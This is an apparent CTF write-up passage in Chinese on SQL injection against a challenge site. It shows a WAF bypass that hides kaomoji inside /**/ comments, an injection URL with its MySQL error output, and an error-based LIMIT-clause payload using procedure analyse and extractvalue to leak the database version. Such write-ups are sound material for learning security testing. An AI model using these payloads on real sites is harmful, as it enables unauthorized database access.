看来后台把空格还有普通的注释都给过滤了,我又想到/**/之间可以随便加东西的,于是我就加了:颜表情
于是我这样注入:
http://sql.sycsec.com/d07127c7c9267637d554c3f79e1ee203/?lalala=1'/*(。☉౪ ⊙。)*/and/*(/TДT)/*/1=1
然后看页面:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/*(。☉౪⊙。)*/and/*(/TДT)/*/1=1' at line 1
居然就这样绕过了那个防火墙,难道防火墙是强行让我们卖萌?简直了
(╬ ̄皿 ̄)凸
然后我们继续注入,我经过不断的尝试,尝试过程略 ㄟ( ▔, ▔ )ㄏ
最后我敏感的察觉到后端的查询语句是类似于这样构造的:
SELECT * FROM user WHERE id >0 ORDER BY id LIMIT 1,
1
lalala传递进去的参数是接到了最后面,也就是我打下划线红字加粗的部分
于是我在谷歌里面搜索到这种注入的方法:
SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1
procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);